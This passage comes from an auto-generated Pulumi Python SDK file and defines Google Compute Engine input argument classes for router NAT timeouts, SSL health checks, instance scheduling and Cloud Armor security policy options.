@pulumi.getter(name="sourceSubnetworkIpRangesToNat")
def source_subnetwork_ip_ranges_to_nat(self) -> Optional[pulumi.Input['RouterNatSourceSubnetworkIpRangesToNat']]:
"""
Specify the Nat option, which can take one of the following values: - ALL_SUBNETWORKS_ALL_IP_RANGES: All of the IP ranges in every Subnetwork are allowed to Nat. - ALL_SUBNETWORKS_ALL_PRIMARY_IP_RANGES: All of the primary IP ranges in every Subnetwork are allowed to Nat. - LIST_OF_SUBNETWORKS: A list of Subnetworks are allowed to Nat (specified in the field subnetwork below) The default is SUBNETWORK_IP_RANGE_TO_NAT_OPTION_UNSPECIFIED. Note that if this field contains ALL_SUBNETWORKS_ALL_IP_RANGES or ALL_SUBNETWORKS_ALL_PRIMARY_IP_RANGES, then there should not be any other Router.Nat section in any Router for this network in this region.
"""
return pulumi.get(self, "source_subnetwork_ip_ranges_to_nat")
@source_subnetwork_ip_ranges_to_nat.setter
def source_subnetwork_ip_ranges_to_nat(self, value: Optional[pulumi.Input['RouterNatSourceSubnetworkIpRangesToNat']]):
pulumi.set(self, "source_subnetwork_ip_ranges_to_nat", value)
@property
@pulumi.getter
def subnetworks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['RouterNatSubnetworkToNatArgs']]]]:
"""
A list of Subnetwork resources whose traffic should be translated by NAT Gateway. It is used only when LIST_OF_SUBNETWORKS is selected for the SubnetworkIpRangeToNatOption above.
"""
return pulumi.get(self, "subnetworks")
@subnetworks.setter
def subnetworks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['RouterNatSubnetworkToNatArgs']]]]):
pulumi.set(self, "subnetworks", value)
@property
@pulumi.getter(name="tcpEstablishedIdleTimeoutSec")
def tcp_established_idle_timeout_sec(self) -> Optional[pulumi.Input[int]]:
"""
Timeout (in seconds) for TCP established connections. Defaults to 1200s if not set.
"""
return pulumi.get(self, "tcp_established_idle_timeout_sec")
@tcp_established_idle_timeout_sec.setter
def tcp_established_idle_timeout_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "tcp_established_idle_timeout_sec", value)
@property
@pulumi.getter(name="tcpTimeWaitTimeoutSec")
def tcp_time_wait_timeout_sec(self) -> Optional[pulumi.Input[int]]:
"""
Timeout (in seconds) for TCP connections that are in TIME_WAIT state. Defaults to 120s if not set.
"""
return pulumi.get(self, "tcp_time_wait_timeout_sec")
@tcp_time_wait_timeout_sec.setter
def tcp_time_wait_timeout_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "tcp_time_wait_timeout_sec", value)
@property
@pulumi.getter(name="tcpTransitoryIdleTimeoutSec")
def tcp_transitory_idle_timeout_sec(self) -> Optional[pulumi.Input[int]]:
"""
Timeout (in seconds) for TCP transitory connections. Defaults to 30s if not set.
"""
return pulumi.get(self, "tcp_transitory_idle_timeout_sec")
@tcp_transitory_idle_timeout_sec.setter
def tcp_transitory_idle_timeout_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "tcp_transitory_idle_timeout_sec", value)
@property
@pulumi.getter(name="udpIdleTimeoutSec")
def udp_idle_timeout_sec(self) -> Optional[pulumi.Input[int]]:
"""
Timeout (in seconds) for UDP connections. Defaults to 30s if not set.
"""
return pulumi.get(self, "udp_idle_timeout_sec")
@udp_idle_timeout_sec.setter
def udp_idle_timeout_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "udp_idle_timeout_sec", value)
@pulumi.input_type
class RuleArgs:
def __init__(__self__, *,
action: Optional[pulumi.Input['RuleAction']] = None,
conditions: Optional[pulumi.Input[Sequence[pulumi.Input['ConditionArgs']]]] = None,
description: Optional[pulumi.Input[str]] = None,
ins: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
log_configs: Optional[pulumi.Input[Sequence[pulumi.Input['LogConfigArgs']]]] = None,
not_ins: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
permissions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
This is deprecated and has no effect. Do not use.
:param pulumi.Input['RuleAction'] action: This is deprecated and has no effect. Do not use.
:param pulumi.Input[Sequence[pulumi.Input['ConditionArgs']]] conditions: This is deprecated and has no effect. Do not use.
:param pulumi.Input[str] description: This is deprecated and has no effect. Do not use.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ins: This is deprecated and has no effect. Do not use.
:param pulumi.Input[Sequence[pulumi.Input['LogConfigArgs']]] log_configs: This is deprecated and has no effect. Do not use.
:param pulumi.Input[Sequence[pulumi.Input[str]]] not_ins: This is deprecated and has no effect. Do not use.
:param pulumi.Input[Sequence[pulumi.Input[str]]] permissions: This is deprecated and has no effect. Do not use.
"""
if action is not None:
pulumi.set(__self__, "action", action)
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
if description is not None:
pulumi.set(__self__, "description", description)
if ins is not None:
pulumi.set(__self__, "ins", ins)
if log_configs is not None:
pulumi.set(__self__, "log_configs", log_configs)
if not_ins is not None:
pulumi.set(__self__, "not_ins", not_ins)
if permissions is not None:
pulumi.set(__self__, "permissions", permissions)
@property
@pulumi.getter
def action(self) -> Optional[pulumi.Input['RuleAction']]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "action")
@action.setter
def action(self, value: Optional[pulumi.Input['RuleAction']]):
pulumi.set(self, "action", value)
@property
@pulumi.getter
def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ConditionArgs']]]]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "conditions")
@conditions.setter
def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ConditionArgs']]]]):
pulumi.set(self, "conditions", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def ins(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "ins")
@ins.setter
def ins(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ins", value)
@property
@pulumi.getter(name="logConfigs")
def log_configs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['LogConfigArgs']]]]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "log_configs")
@log_configs.setter
def log_configs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['LogConfigArgs']]]]):
pulumi.set(self, "log_configs", value)
@property
@pulumi.getter(name="notIns")
def not_ins(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "not_ins")
@not_ins.setter
def not_ins(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "not_ins", value)
@property
@pulumi.getter
def permissions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "permissions")
@permissions.setter
def permissions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "permissions", value)
@pulumi.input_type
class SSLHealthCheckArgs:
def __init__(__self__, *,
port: Optional[pulumi.Input[int]] = None,
port_name: Optional[pulumi.Input[str]] = None,
port_specification: Optional[pulumi.Input['SSLHealthCheckPortSpecification']] = None,
proxy_header: Optional[pulumi.Input['SSLHealthCheckProxyHeader']] = None,
request: Optional[pulumi.Input[str]] = None,
response: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[int] port: The TCP port number for the health check request. The default value is 443. Valid values are 1 through 65535.
:param pulumi.Input[str] port_name: Port name as defined in InstanceGroup#NamedPort#name. If both port and port_name are defined, port takes precedence.
:param pulumi.Input['SSLHealthCheckPortSpecification'] port_specification: Specifies how port is selected for health checking, can be one of following values: USE_FIXED_PORT: The port number in port is used for health checking. USE_NAMED_PORT: The portName is used for health checking. USE_SERVING_PORT: For NetworkEndpointGroup, the port specified for each network endpoint is used for health checking. For other backends, the port or named port specified in the Backend Service is used for health checking. If not specified, SSL health check follows behavior specified in port and portName fields.
:param pulumi.Input['SSLHealthCheckProxyHeader'] proxy_header: Specifies the type of proxy header to append before sending data to the backend, either NONE or PROXY_V1. The default is NONE.
:param pulumi.Input[str] request: The application data to send once the SSL connection has been established (default value is empty). If both request and response are empty, the connection establishment alone will indicate health. The request data can only be ASCII.
:param pulumi.Input[str] response: The bytes to match against the beginning of the response data. If left empty (the default value), any response will indicate health. The response data can only be ASCII.
"""
if port is not None:
pulumi.set(__self__, "port", port)
if port_name is not None:
pulumi.set(__self__, "port_name", port_name)
if port_specification is not None:
pulumi.set(__self__, "port_specification", port_specification)
if proxy_header is not None:
pulumi.set(__self__, "proxy_header", proxy_header)
if request is not None:
pulumi.set(__self__, "request", request)
if response is not None:
pulumi.set(__self__, "response", response)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
The TCP port number for the health check request. The default value is 443. Valid values are 1 through 65535.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="portName")
def port_name(self) -> Optional[pulumi.Input[str]]:
"""
Port name as defined in InstanceGroup#NamedPort#name. If both port and port_name are defined, port takes precedence.
"""
return pulumi.get(self, "port_name")
@port_name.setter
def port_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "port_name", value)
@property
@pulumi.getter(name="portSpecification")
def port_specification(self) -> Optional[pulumi.Input['SSLHealthCheckPortSpecification']]:
"""
Specifies how port is selected for health checking, can be one of following values: USE_FIXED_PORT: The port number in port is used for health checking. USE_NAMED_PORT: The portName is used for health checking. USE_SERVING_PORT: For NetworkEndpointGroup, the port specified for each network endpoint is used for health checking. For other backends, the port or named port specified in the Backend Service is used for health checking. If not specified, SSL health check follows behavior specified in port and portName fields.
"""
return pulumi.get(self, "port_specification")
@port_specification.setter
def port_specification(self, value: Optional[pulumi.Input['SSLHealthCheckPortSpecification']]):
pulumi.set(self, "port_specification", value)
@property
@pulumi.getter(name="proxyHeader")
def proxy_header(self) -> Optional[pulumi.Input['SSLHealthCheckProxyHeader']]:
"""
Specifies the type of proxy header to append before sending data to the backend, either NONE or PROXY_V1. The default is NONE.
"""
return pulumi.get(self, "proxy_header")
@proxy_header.setter
def proxy_header(self, value: Optional[pulumi.Input['SSLHealthCheckProxyHeader']]):
pulumi.set(self, "proxy_header", value)
@property
@pulumi.getter
def request(self) -> Optional[pulumi.Input[str]]:
"""
The application data to send once the SSL connection has been established (default value is empty). If both request and response are empty, the connection establishment alone will indicate health. The request data can only be ASCII.
"""
return pulumi.get(self, "request")
@request.setter
def request(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "request", value)
@property
@pulumi.getter
def response(self) -> Optional[pulumi.Input[str]]:
"""
The bytes to match against the beginning of the response data. If left empty (the default value), any response will indicate health. The response data can only be ASCII.
"""
return pulumi.get(self, "response")
@response.setter
def response(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "response", value)
@pulumi.input_type
class SavedDiskArgs:
def __init__(__self__, *,
source_disk: Optional[pulumi.Input[str]] = None):
"""
An instance-attached disk resource.
:param pulumi.Input[str] source_disk: Specifies a URL of the disk attached to the source instance.
"""
if source_disk is not None:
pulumi.set(__self__, "source_disk", source_disk)
@property
@pulumi.getter(name="sourceDisk")
def source_disk(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a URL of the disk attached to the source instance.
"""
return pulumi.get(self, "source_disk")
@source_disk.setter
def source_disk(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_disk", value)
@pulumi.input_type
class SchedulingNodeAffinityArgs:
def __init__(__self__, *,
key: Optional[pulumi.Input[str]] = None,
operator: Optional[pulumi.Input['SchedulingNodeAffinityOperator']] = None,
values: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Node Affinity: the configuration of desired nodes onto which this Instance could be scheduled.
:param pulumi.Input[str] key: Corresponds to the label key of Node resource.
:param pulumi.Input['SchedulingNodeAffinityOperator'] operator: Defines the operation of node selection. Valid operators are IN for affinity and NOT_IN for anti-affinity.
:param pulumi.Input[Sequence[pulumi.Input[str]]] values: Corresponds to the label values of Node resource.
"""
if key is not None:
pulumi.set(__self__, "key", key)
if operator is not None:
pulumi.set(__self__, "operator", operator)
if values is not None:
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
Corresponds to the label key of Node resource.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def operator(self) -> Optional[pulumi.Input['SchedulingNodeAffinityOperator']]:
"""
Defines the operation of node selection. Valid operators are IN for affinity and NOT_IN for anti-affinity.
"""
return pulumi.get(self, "operator")
@operator.setter
def operator(self, value: Optional[pulumi.Input['SchedulingNodeAffinityOperator']]):
pulumi.set(self, "operator", value)
@property
@pulumi.getter
def values(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Corresponds to the label values of Node resource.
"""
return pulumi.get(self, "values")
@values.setter
def values(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "values", value)
@pulumi.input_type
class SchedulingArgs:
def __init__(__self__, *,
automatic_restart: Optional[pulumi.Input[bool]] = None,
host_error_timeout_seconds: Optional[pulumi.Input[int]] = None,
instance_termination_action: Optional[pulumi.Input['SchedulingInstanceTerminationAction']] = None,
location_hint: Optional[pulumi.Input[str]] = None,
maintenance_freeze_duration_hours: Optional[pulumi.Input[int]] = None,
maintenance_interval: Optional[pulumi.Input['SchedulingMaintenanceInterval']] = None,
min_node_cpus: Optional[pulumi.Input[int]] = None,
node_affinities: Optional[pulumi.Input[Sequence[pulumi.Input['SchedulingNodeAffinityArgs']]]] = None,
on_host_maintenance: Optional[pulumi.Input['SchedulingOnHostMaintenance']] = None,
preemptible: Optional[pulumi.Input[bool]] = None,
provisioning_model: Optional[pulumi.Input['SchedulingProvisioningModel']] = None):
"""
Sets the scheduling options for an Instance. NextID: 21
:param pulumi.Input[bool] automatic_restart: Specifies whether the instance should be automatically restarted if it is terminated by Compute Engine (not terminated by a user). You can only set the automatic restart option for standard instances. Preemptible instances cannot be automatically restarted. By default, this is set to true so an instance is automatically restarted if it is terminated by Compute Engine.
:param pulumi.Input[int] host_error_timeout_seconds: Specify the time in seconds for host error detection, the value must be within the range of [90, 330] with the increment of 30, if unset, the default behavior of host error recovery will be used.
:param pulumi.Input['SchedulingInstanceTerminationAction'] instance_termination_action: Specifies the termination action for the instance.
:param pulumi.Input[str] location_hint: An opaque location hint used to place the instance close to other resources. This field is for use by internal tools that use the public API.
:param pulumi.Input[int] maintenance_freeze_duration_hours: Specifies the number of hours after VM instance creation where the VM won't be scheduled for maintenance.
:param pulumi.Input['SchedulingMaintenanceInterval'] maintenance_interval: For more information about maintenance intervals, see Setting maintenance intervals.
:param pulumi.Input[int] min_node_cpus: The minimum number of virtual CPUs this instance will consume when running on a sole-tenant node.
:param pulumi.Input[Sequence[pulumi.Input['SchedulingNodeAffinityArgs']]] node_affinities: A set of node affinity and anti-affinity configurations. Refer to Configuring node affinity for more information. Overrides reservationAffinity.
:param pulumi.Input['SchedulingOnHostMaintenance'] on_host_maintenance: Defines the maintenance behavior for this instance. For standard instances, the default behavior is MIGRATE. For preemptible instances, the default and only possible behavior is TERMINATE. For more information, see Setting Instance Scheduling Options.
:param pulumi.Input[bool] preemptible: Defines whether the instance is preemptible. This can only be set during instance creation or while the instance is stopped and therefore, in a `TERMINATED` state. See Instance Life Cycle for more information on the possible instance states.
:param pulumi.Input['SchedulingProvisioningModel'] provisioning_model: Specifies the provisioning model of the instance.
"""
if automatic_restart is not None:
pulumi.set(__self__, "automatic_restart", automatic_restart)
if host_error_timeout_seconds is not None:
pulumi.set(__self__, "host_error_timeout_seconds", host_error_timeout_seconds)
if instance_termination_action is not None:
pulumi.set(__self__, "instance_termination_action", instance_termination_action)
if location_hint is not None:
pulumi.set(__self__, "location_hint", location_hint)
if maintenance_freeze_duration_hours is not None:
pulumi.set(__self__, "maintenance_freeze_duration_hours", maintenance_freeze_duration_hours)
if maintenance_interval is not None:
pulumi.set(__self__, "maintenance_interval", maintenance_interval)
if min_node_cpus is not None:
pulumi.set(__self__, "min_node_cpus", min_node_cpus)
if node_affinities is not None:
pulumi.set(__self__, "node_affinities", node_affinities)
if on_host_maintenance is not None:
pulumi.set(__self__, "on_host_maintenance", on_host_maintenance)
if preemptible is not None:
pulumi.set(__self__, "preemptible", preemptible)
if provisioning_model is not None:
pulumi.set(__self__, "provisioning_model", provisioning_model)
@property
@pulumi.getter(name="automaticRestart")
def automatic_restart(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the instance should be automatically restarted if it is terminated by Compute Engine (not terminated by a user). You can only set the automatic restart option for standard instances. Preemptible instances cannot be automatically restarted. By default, this is set to true so an instance is automatically restarted if it is terminated by Compute Engine.
"""
return pulumi.get(self, "automatic_restart")
@automatic_restart.setter
def automatic_restart(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "automatic_restart", value)
@property
@pulumi.getter(name="hostErrorTimeoutSeconds")
def host_error_timeout_seconds(self) -> Optional[pulumi.Input[int]]:
"""
Specify the time in seconds for host error detection, the value must be within the range of [90, 330] with the increment of 30, if unset, the default behavior of host error recovery will be used.
"""
return pulumi.get(self, "host_error_timeout_seconds")
@host_error_timeout_seconds.setter
def host_error_timeout_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "host_error_timeout_seconds", value)
@property
@pulumi.getter(name="instanceTerminationAction")
def instance_termination_action(self) -> Optional[pulumi.Input['SchedulingInstanceTerminationAction']]:
"""
Specifies the termination action for the instance.
"""
return pulumi.get(self, "instance_termination_action")
@instance_termination_action.setter
def instance_termination_action(self, value: Optional[pulumi.Input['SchedulingInstanceTerminationAction']]):
pulumi.set(self, "instance_termination_action", value)
@property
@pulumi.getter(name="locationHint")
def location_hint(self) -> Optional[pulumi.Input[str]]:
"""
An opaque location hint used to place the instance close to other resources. This field is for use by internal tools that use the public API.
"""
return pulumi.get(self, "location_hint")
@location_hint.setter
def location_hint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location_hint", value)
@property
@pulumi.getter(name="maintenanceFreezeDurationHours")
def maintenance_freeze_duration_hours(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the number of hours after VM instance creation where the VM won't be scheduled for maintenance.
"""
return pulumi.get(self, "maintenance_freeze_duration_hours")
@maintenance_freeze_duration_hours.setter
def maintenance_freeze_duration_hours(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "maintenance_freeze_duration_hours", value)
@property
@pulumi.getter(name="maintenanceInterval")
def maintenance_interval(self) -> Optional[pulumi.Input['SchedulingMaintenanceInterval']]:
"""
For more information about maintenance intervals, see Setting maintenance intervals.
"""
return pulumi.get(self, "maintenance_interval")
@maintenance_interval.setter
def maintenance_interval(self, value: Optional[pulumi.Input['SchedulingMaintenanceInterval']]):
pulumi.set(self, "maintenance_interval", value)
@property
@pulumi.getter(name="minNodeCpus")
def min_node_cpus(self) -> Optional[pulumi.Input[int]]:
"""
The minimum number of virtual CPUs this instance will consume when running on a sole-tenant node.
"""
return pulumi.get(self, "min_node_cpus")
@min_node_cpus.setter
def min_node_cpus(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_node_cpus", value)
@property
@pulumi.getter(name="nodeAffinities")
def node_affinities(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SchedulingNodeAffinityArgs']]]]:
"""
A set of node affinity and anti-affinity configurations. Refer to Configuring node affinity for more information. Overrides reservationAffinity.
"""
return pulumi.get(self, "node_affinities")
@node_affinities.setter
def node_affinities(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SchedulingNodeAffinityArgs']]]]):
pulumi.set(self, "node_affinities", value)
@property
@pulumi.getter(name="onHostMaintenance")
def on_host_maintenance(self) -> Optional[pulumi.Input['SchedulingOnHostMaintenance']]:
"""
Defines the maintenance behavior for this instance. For standard instances, the default behavior is MIGRATE. For preemptible instances, the default and only possible behavior is TERMINATE. For more information, see Setting Instance Scheduling Options.
"""
return pulumi.get(self, "on_host_maintenance")
@on_host_maintenance.setter
def on_host_maintenance(self, value: Optional[pulumi.Input['SchedulingOnHostMaintenance']]):
pulumi.set(self, "on_host_maintenance", value)
@property
@pulumi.getter
def preemptible(self) -> Optional[pulumi.Input[bool]]:
"""
Defines whether the instance is preemptible. This can only be set during instance creation or while the instance is stopped and therefore, in a `TERMINATED` state. See Instance Life Cycle for more information on the possible instance states.
"""
return pulumi.get(self, "preemptible")
@preemptible.setter
def preemptible(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "preemptible", value)
@property
@pulumi.getter(name="provisioningModel")
def provisioning_model(self) -> Optional[pulumi.Input['SchedulingProvisioningModel']]:
"""
Specifies the provisioning model of the instance.
"""
return pulumi.get(self, "provisioning_model")
@provisioning_model.setter
def provisioning_model(self, value: Optional[pulumi.Input['SchedulingProvisioningModel']]):
pulumi.set(self, "provisioning_model", value)
@pulumi.input_type
class SecurityPolicyAdaptiveProtectionConfigLayer7DdosDefenseConfigArgs:
def __init__(__self__, *,
enable: Optional[pulumi.Input[bool]] = None,
rule_visibility: Optional[pulumi.Input['SecurityPolicyAdaptiveProtectionConfigLayer7DdosDefenseConfigRuleVisibility']] = None):
"""
Configuration options for L7 DDoS detection.
:param pulumi.Input[bool] enable: If set to true, enables CAAP for L7 DDoS detection.
:param pulumi.Input['SecurityPolicyAdaptiveProtectionConfigLayer7DdosDefenseConfigRuleVisibility'] rule_visibility: Rule visibility can be one of the following: STANDARD - opaque rules. (default) PREMIUM - transparent rules.
"""
if enable is not None:
pulumi.set(__self__, "enable", enable)
if rule_visibility is not None:
pulumi.set(__self__, "rule_visibility", rule_visibility)
@property
@pulumi.getter
def enable(self) -> Optional[pulumi.Input[bool]]:
"""
If set to true, enables CAAP for L7 DDoS detection.
"""
return pulumi.get(self, "enable")
@enable.setter
def enable(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable", value)
@property
@pulumi.getter(name="ruleVisibility")
def rule_visibility(self) -> Optional[pulumi.Input['SecurityPolicyAdaptiveProtectionConfigLayer7DdosDefenseConfigRuleVisibility']]:
"""
Rule visibility can be one of the following: STANDARD - opaque rules. (default) PREMIUM - transparent rules.
"""
return pulumi.get(self, "rule_visibility")
@rule_visibility.setter
def rule_visibility(self, value: Optional[pulumi.Input['SecurityPolicyAdaptiveProtectionConfigLayer7DdosDefenseConfigRuleVisibility']]):
pulumi.set(self, "rule_visibility", value)
@pulumi.input_type
class SecurityPolicyAdaptiveProtectionConfigArgs:
def __init__(__self__, *,
layer7_ddos_defense_config: Optional[pulumi.Input['SecurityPolicyAdaptiveProtectionConfigLayer7DdosDefenseConfigArgs']] = None):
"""
Configuration options for Cloud Armor Adaptive Protection (CAAP).
:param pulumi.Input['SecurityPolicyAdaptiveProtectionConfigLayer7DdosDefenseConfigArgs'] layer7_ddos_defense_config: If set to true, enables Cloud Armor Machine Learning.
"""
if layer7_ddos_defense_config is not None:
pulumi.set(__self__, "layer7_ddos_defense_config", layer7_ddos_defense_config)
@property
@pulumi.getter(name="layer7DdosDefenseConfig")
def layer7_ddos_defense_config(self) -> Optional[pulumi.Input['SecurityPolicyAdaptiveProtectionConfigLayer7DdosDefenseConfigArgs']]:
"""
If set to true, enables Cloud Armor Machine Learning.
"""
return pulumi.get(self, "layer7_ddos_defense_config")
@layer7_ddos_defense_config.setter
def layer7_ddos_defense_config(self, value: Optional[pulumi.Input['SecurityPolicyAdaptiveProtectionConfigLayer7DdosDefenseConfigArgs']]):
pulumi.set(self, "layer7_ddos_defense_config", value)
@pulumi.input_type
class SecurityPolicyAdvancedOptionsConfigArgs:
def __init__(__self__, *,
json_parsing: Optional[pulumi.Input['SecurityPolicyAdvancedOptionsConfigJsonParsing']] = None,
log_level: Optional[pulumi.Input['SecurityPolicyAdvancedOptionsConfigLogLevel']] = None):
if json_parsing is not None:
pulumi.set(__self__, "json_parsing", json_parsing)
if log_level is not None:
pulumi.set(__self__, "log_level", log_level)
@property
@pulumi.getter(name="jsonParsing")
def json_parsing(self) -> Optional[pulumi.Input['SecurityPolicyAdvancedOptionsConfigJsonParsing']]:
return pulumi.get(self, "json_parsing")
@json_parsing.setter
def json_parsing(self, value: Optional[pulumi.Input['SecurityPolicyAdvancedOptionsConfigJsonParsing']]):
pulumi.set(self, "json_parsing", value)
@property
@pulumi.getter(name="logLevel")
def log_level(self) -> Optional[pulumi.Input['SecurityPolicyAdvancedOptionsConfigLogLevel']]:
return pulumi.get(self, "log_level")
@log_level.setter
def log_level(self, value: Optional[pulumi.Input['SecurityPolicyAdvancedOptionsConfigLogLevel']]):
pulumi.set(self, "log_level", value)
@pulumi.input_type
class SecurityPolicyAssociationArgs:
def __init__(__self__, *,
attachment_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] attachment_id: The resource that the security policy is attached to.
:param pulumi.Input[str] name: The name for an association.
"""
if attachment_id is not None:
pulumi.set(__self__, "attachment_id", attachment_id)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="attachmentId")
def attachment_id(self) -> Optional[pulumi.Input[str]]:
"""
The resource that the security policy is attached to.
"""
return pulumi.get(self, "attachment_id")
@attachment_id.setter
def attachment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "attachment_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name for an association.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class SecurityPolicyRecaptchaOptionsConfigArgs:
def __init__(__self__, *,
redirect_site_key: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] redirect_site_key: An optional field to supply a reCAPTCHA site key to be used for all the rules using the redirect action with the type of GOOGLE_RECAPTCHA under the security policy. The specified site key needs to be created from the reCAPTCHA API. The user is responsible for the validity of the specified site key. If not specified, a Google-managed site key is used.
"""
if redirect_site_key is not None:
pulumi.set(__self__, "redirect_site_key", redirect_site_key)
@property
@pulumi.getter(name="redirectSiteKey")
def redirect_site_key(self) -> Optional[pulumi.Input[str]]:
"""
An optional field to supply a reCAPTCHA site key to be used for all the rules using the redirect action with the type of GOOGLE_RECAPTCHA under the security policy. The specified site key needs to be created from the reCAPTCHA API. The user is responsible for the validity of the specified site key. If not specified, a Google-managed site key is used.
"""
return pulumi.get(self, "redirect_site_key")
@redirect_site_key.setter
def redirect_site_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "redirect_site_key", value)
@pulumi.input_type
class SecurityPolicyRuleHttpHeaderActionHttpHeaderOptionArgs:
def __init__(__self__, *,
header_name: Optional[pulumi.Input[str]] = None,
header_value: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] header_name: The name of the header to set.
:param pulumi.Input[str] header_value: The value to set the named header to.
"""
if header_name is not None:
pulumi.set(__self__, "header_name", header_name)
if header_value is not None:
pulumi.set(__self__, "header_value", header_value)
@property
@pulumi.getter(name="headerName")
def header_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the header to set.
"""
return pulumi.get(self, "header_name")
@header_name.setter
def header_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "header_name", value)
@property
@pulumi.getter(name="headerValue")
def header_value(self) -> Optional[pulumi.Input[str]]:
"""
The value to set the named header to.
"""
return pulumi.get(self, "header_value")
@header_value.setter
def header_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "header_value", value)
@pulumi.input_type
class SecurityPolicyRuleHttpHeaderActionArgs:
def __init__(__self__, *,
request_headers_to_adds: Optional[pulumi.Input[Sequence[pulumi.Input['SecurityPolicyRuleHttpHeaderActionHttpHeaderOptionArgs']]]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input['SecurityPolicyRuleHttpHeaderActionHttpHeaderOptionArgs']]] request_headers_to_adds: The list of request headers to add or overwrite if they're already present.
"""
if request_headers_to_adds is not None:
pulumi.set(__self__, "request_headers_to_adds", request_headers_to_adds)
@property
@pulumi.getter(name="requestHeadersToAdds")
def request_headers_to_adds(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SecurityPolicyRuleHttpHeaderActionHttpHeaderOptionArgs']]]]:
"""
The list of request headers to add or overwrite if they're already present.
"""
return pulumi.get(self, "request_headers_to_adds")
@request_headers_to_adds.setter
def request_headers_to_adds(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SecurityPolicyRuleHttpHeaderActionHttpHeaderOptionArgs']]]]):
pulumi.set(self, "request_headers_to_adds", value)
@pulumi.input_type
class SecurityPolicyRuleMatcherConfigLayer4ConfigArgs:
def __init__(__self__, *,
ip_protocol: Optional[pulumi.Input[str]] = None,
ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[str] ip_protocol: The IP protocol to which this rule applies. The protocol type is required when creating a firewall rule. This value can either be one of the following well known protocol strings (tcp, udp, icmp, esp, ah, ipip, sctp), or the IP protocol number.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ports: An optional list of ports to which this rule applies. This field is only applicable for UDP or TCP protocol. Each entry must be either an integer or a range. If not specified, this rule applies to connections through any port. Example inputs include: ["22"], ["80","443"], and ["12345-12349"]. This field may only be specified when versioned_expr is set to FIREWALL.
"""
